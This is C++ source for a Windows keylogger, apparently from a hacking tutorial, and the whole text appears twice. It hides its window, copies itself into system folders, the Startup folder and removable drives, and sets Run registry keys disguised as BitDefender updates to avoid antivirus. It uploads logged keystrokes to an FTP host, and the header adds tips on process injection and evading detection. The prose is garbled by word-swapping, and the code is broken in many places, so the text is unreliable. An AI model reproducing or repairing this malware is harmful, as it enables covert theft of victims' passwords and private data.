/*
FIRST VERSION
Ls Learn C Not xvi Bit,Windows C++ Before Reading On. Get The Win Help File For Reference
The First Function Is The Key Loggere Part(Pay Load) Which Simply Logs Key Strokes
Getkeypress(Int Keypress)
Getasynckeypressstate This Module Got The State Of Each Keys Which Is Passed Over To Our Function,The Int Ascii Value Of The Keys And Converted To Strings And Saved Ina File In C:\Sas.Txt
/*This Is Not Influenza A virus subtype H5N1 Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)
what it does
1)geting the attain got to the windows created using hwnd
findwindowa("consolewindowclass",null);
2)registry entry valuse hkey
*********then the enshroud attain got to enshroud the virus******************
3)using the attain got obtained inwards "hide" nosotros sick laid it to locomote hiden so that itwill run inwards the dorsum Earth bt nt visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to locomote the electrical current path attain got for moving it from electrical current rank to another
5)getmodulefilename
used to locomote the electrical current organisation directory it differs on the insatllation of windows on diff drives
*********victims organisation file location***************
6)once subsequently getting the organisation directory ex:c:\windows\system32
7)i append the path of virus re-create c:\windows\system32 + bitdefenderupdates.exe using string truthful cat function
8)now re-create from electrical current excuted path to novel house using copyfile(locate,temprot,false);
copyfile(locate,"c:\\documents together with settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe",false);
************breath of the virus*******************
9)setting it to locomote autoloaded always fourth dimension windows starts,we merely appendfewlines to the registry
10)it sends you lot the log keystrokes via mail usint ftp() function
we write ii star upward entryone a link to the electrical current module together with i to a fixed path so to evade from mutual anti virus detection
regsetvalueex(fixstup,"bit defender updates ",0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings together with leg of virus*******************
am non including those constituent equally its uncomplicated jsut write a text file amongst autorun entries to the removable drives together with so it sick locomote able to spread
and its ready
*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use Influenza A virus subtype H5N1 Parasitic Infection Technique To Get Auto Started
This Dont Check Whether Influenza A virus subtype H5N1 Removable Media Exsist Add Influenza A virus subtype H5N1 Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As Influenza A virus subtype H5N1 Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create Influenza A virus subtype H5N1 Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make Influenza A virus subtype H5N1 Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs
HAPPY HACKING
*\
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <wininet.h>
#include <fstream.h>
string Getkeypress(int keypress)
{
string tempkeypress = "";
if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
if (keypress > 64 && keypress < 91)
{
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
// Add code to banking concern agree file size for trigering ftp file traansfer
if ((fp = open("c://sas.txt", O_RDONLY)) != -1)
fsize = filelength(fp);
if(fsize> 1000);//TRIGER THE FTP FILE TRANSFER WHEN FILE REACHES Influenza A virus subtype H5N1 FILE SIZE SPECIFY IN BYTES
//1MB = 1048576 bytes
int ftp();
else
{
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}
return tempkeypress;
}
int ftp()
{
HINTERNET ftp=InternetOpen(TEXT("LOG UPLOAD"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!ftp)
provide 0;
else
{
HINTERNET ftplogin=InternetConnect(Open,"ftp.myftp.com",21,
"usname","pwd",INTERNET_SERVICE_FTP,0,0);
BOOL log = FtpPutFile(ftplogin,loger,"log.txt",FTP_TRANSFER_TYPE_BINARY,0);//here u could usage a file cite based on appointment to avoid over writing
if (log==FALSE)
{
InternetCloseHandle(ftp);
InternetCloseHandle(ftplogin);
provide 0;
}
provide 1;
}
}
int main()
{
HWND hide;
long fsize;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
LPVOID tempbuffer = NULL;
char temprot[TOT_SIZ];
BOOL buffera = TRUE, filesus = FALSE;
DWORD HANDLE fupldhandle = NULL;
TCHAR loger = TEXT("c\\sas.txt");
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
DWORD fread = 0, favail = 0;
char LOCATE[TOT_SIZ];/*creating enshroud */
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents together with Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
std::string Filename = "C:\\SAS.txt";
/*srt up*/
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,
RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));
/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
while(1==1)
{
Sleep(3);
for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}
FIRST VERSION
Ls Learn C Not xvi Bit,Windows C++ Before Reading On. Get The Win Help File For Reference
The First Function Is The Key Loggere Part(Pay Load) Which Simply Logs Key Strokes
Getkeypress(Int Keypress)
Getasynckeypressstate This Module Got The State Of Each Keys Which Is Passed Over To Our Function,The Int Ascii Value Of The Keys And Converted To Strings And Saved Ina File In C:\Sas.Txt
/*This Is Not Influenza A virus subtype H5N1 Good Method For Making The Key Kolggers But Preferably The First And Easy Option.Piping Out The Key Strokes Using The Key Bord Hooks Are The Best Method For Doing It(Google For It)
what it does
1)geting the attain got to the windows created using hwnd
findwindowa("consolewindowclass",null);
2)registry entry valuse hkey
*********then the enshroud attain got to enshroud the virus******************
3)using the attain got obtained inwards "hide" nosotros sick laid it to locomote hiden so that itwill run inwards the dorsum Earth bt nt visible
getmodulefilename(getmodh,locate,sizeof(locate));
4)used to locomote the electrical current path attain got for moving it from electrical current rank to another
5)getmodulefilename
used to locomote the electrical current organisation directory it differs on the insatllation of windows on diff drives
*********victims organisation file location***************
6)once subsequently getting the organisation directory ex:c:\windows\system32
7)i append the path of virus re-create c:\windows\system32 + bitdefenderupdates.exe using string truthful cat function
8)now re-create from electrical current excuted path to novel house using copyfile(locate,temprot,false);
copyfile(locate,"c:\\documents together with settings\\all users\\start menu\\programs\\startup\\bitdefender_update.exe",false);
************breath of the virus*******************
9)setting it to locomote autoloaded always fourth dimension windows starts,we merely appendfewlines to the registry
10)it sends you lot the log keystrokes via mail usint ftp() function
we write ii star upward entryone a link to the electrical current module together with i to a fixed path so to evade from mutual anti virus detection
regsetvalueex(fixstup,"bit defender updates ",0,re_sz,(lpbyte)system2,sizeof(system2));
its ready
****************the wings together with leg of virus*******************
am non including those constituent equally its uncomplicated jsut write a text file amongst autorun entries to the removable drives together with so it sick locomote able to spread
and its ready
*****************************OTHER TECHNIQUES AND Improvements***********************
Just By Ading Few More Codes You Could Make It Un Detactable By Process Vivers And Task Managers
Just By Doing Few Researchs You Could Make It Un Detactable By Anti Virus
Insted Of The Direct Startup Entry Use Influenza A virus subtype H5N1 Parasitic Infection Technique To Get Auto Started
This Dont Check Whether Influenza A virus subtype H5N1 Removable Media Exsist Add Influenza A virus subtype H5N1 Function To Chek The Presence And Then Append The Virusu May Use Shchangenotifyregister To Get Notified Of Any New Drives
U Could All Make It As Influenza A virus subtype H5N1 Dll And Make Code It To Inject Inot Other Running Process For That Allu Neeed To Do Is To Get The List Of Process On Statup Create Influenza A virus subtype H5N1 Remote Thread And Inject It To The Stup Applications Virtual Memmory
Just Copy Paste And Compile Wont Work For For These Codes As I Have Added Lots Of Bugs In It.If You Really Wanna Make Influenza A virus subtype H5N1 Virus You May Try To Investigate And Correct Those Errors Else Leave It.I Don Encourage Script Kiddies
Ill Work Fine And Tested On Vc++,Blood Shed,And Boroland Cs
HAPPY HACKING
*\
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <wininet.h>
#include <fstream.h>
string Getkeypress(int keypress)
{
string tempkeypress = "";
if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
if (keypress > 64 && keypress < 91)
{
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
// Add code to banking concern agree file size for trigering ftp file traansfer
if ((fp = open("c://sas.txt", O_RDONLY)) != -1)
fsize = filelength(fp);
if(fsize> 1000);//TRIGER THE FTP FILE TRANSFER WHEN FILE REACHES Influenza A virus subtype H5N1 FILE SIZE SPECIFY IN BYTES
//1MB = 1048576 bytes
int ftp();
else
{
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}
return tempkeypress;
}
int ftp()
{
HINTERNET ftp=InternetOpen(TEXT("LOG UPLOAD"),INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!ftp)
provide 0;
else
{
HINTERNET ftplogin=InternetConnect(Open,"ftp.myftp.com",21,
"usname","pwd",INTERNET_SERVICE_FTP,0,0);
BOOL log = FtpPutFile(ftplogin,loger,"log.txt",FTP_TRANSFER_TYPE_BINARY,0);//here u could usage a file cite based on appointment to avoid over writing
if (log==FALSE)
{
InternetCloseHandle(ftp);
InternetCloseHandle(ftplogin);
provide 0;
}
provide 1;
}
}
int main()
{
HWND hide;
long fsize;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
LPVOID tempbuffer = NULL;
char temprot[TOT_SIZ];
BOOL buffera = TRUE, filesus = FALSE;
DWORD HANDLE fupldhandle = NULL;
TCHAR loger = TEXT("c\\sas.txt");
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
DWORD fread = 0, favail = 0;
char LOCATE[TOT_SIZ];/*creating enshroud */
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents together with Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
std::string Filename = "C:\\SAS.txt";
/*srt up*/
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,
RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));
/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
while(1==1)
{
Sleep(3);
for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}
